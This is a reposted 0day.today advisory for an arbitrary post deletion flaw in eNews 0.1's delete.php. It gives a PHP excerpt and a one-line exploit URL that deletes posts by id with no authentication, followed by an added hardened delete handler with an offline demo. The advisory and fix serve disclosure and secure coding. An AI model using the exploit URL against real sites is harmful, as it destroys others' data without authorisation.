0day Today Exploits Market and 0day Exploits Database

eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability

Author: ilker Kandemir
Risk: Security Risk Unsorted
0day-ID: 0day-ID-3243
Category: web applications
Date added: 20-06-2008
Platform: unsorted
==========================================================
eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability
==========================================================





Author: iLker Kandemir [MEFISTO]

Script download : http://www.hotscripts.com/Detailed/81086.html

script demo : http://emvvy.com/demos/enews/

site : www.dumenci.net

----------------------------------------------------------------
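//poc:

// Excerpt from delete.php. The id is typed as "int", but the excerpt shows
// no login or permission check before the DELETE statement is built.
if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
  $deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
                       GetSQLValueString($_GET['delete'], "int"));
  // ... remainder of the handler is not shown in the advisory
}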

----------------------------------------------------------------

//exploit :

http://[site]/delete.php?delete=[eNews_id]

----------------------------------------------------------------

tnx : aLL my FriEndZ 
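
A hardened form of the delete handler, for comparison with the excerpt above. This is an added example, not code from the advisory or from eNews: the function name `handle_delete`, the session keys `user_id` and `csrf`, the `csrf` form field and the in-memory SQLite demo table are all assumptions. Only the `news` table and the `delete` parameter come from the excerpt.

```php
<?php
// Added example (not eNews code): delete a post only after method,
// authentication, CSRF and input checks pass. Session keys and the
// csrf field name are assumptions made for illustration.
declare(strict_types=1);

/** Returns the HTTP status the caller should send. */
function handle_delete(PDO $pdo, string $method, array $post, array $session): int
{
    // 1. State-changing action: refuse GET so a bare link cannot trigger it.
    if ($method !== 'POST') {
        return 405;
    }
    // 2. Authentication: the excerpt in the advisory shows no such check.
    if (empty($session['user_id'])) {
        return 401;
    }
    // 3. CSRF: constant-time comparison against the per-session token.
    $known = $session['csrf'] ?? '';
    $token = $post['csrf'] ?? '';
    if (!is_string($known) || !is_string($token) || $known === ''
        || !hash_equals($known, $token)) {
        return 403;
    }
    // 4. Input: accept a positive integer id and nothing else.
    $id = filter_var($post['delete'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 400;
    }
    // 5. Parameterised statement instead of sprintf() into the SQL string.
    $stmt = $pdo->prepare('DELETE FROM news WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->rowCount() === 1 ? 200 : 404;
}

// Offline demo on constructed data (in-memory SQLite, needs pdo_sqlite).
if (PHP_SAPI === 'cli') {
    $pdo = new PDO('sqlite::memory:');
    $pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO news (id, title) VALUES (1, 'constructed row')");
    $sess = ['user_id' => 7, 'csrf' => 'constructed-token'];
    $good = ['delete' => '1', 'csrf' => 'constructed-token'];
    var_dump(handle_delete($pdo, 'GET', ['delete' => '1'], $sess));
    var_dump(handle_delete($pdo, 'POST', ['delete' => '1'], []));
    var_dump(handle_delete($pdo, 'POST', $good, $sess));
}
```

In a web deployment the same function would be called with `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION`, and its return value passed to `http_response_code()`.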




#  0day.today [2024-12-25]  #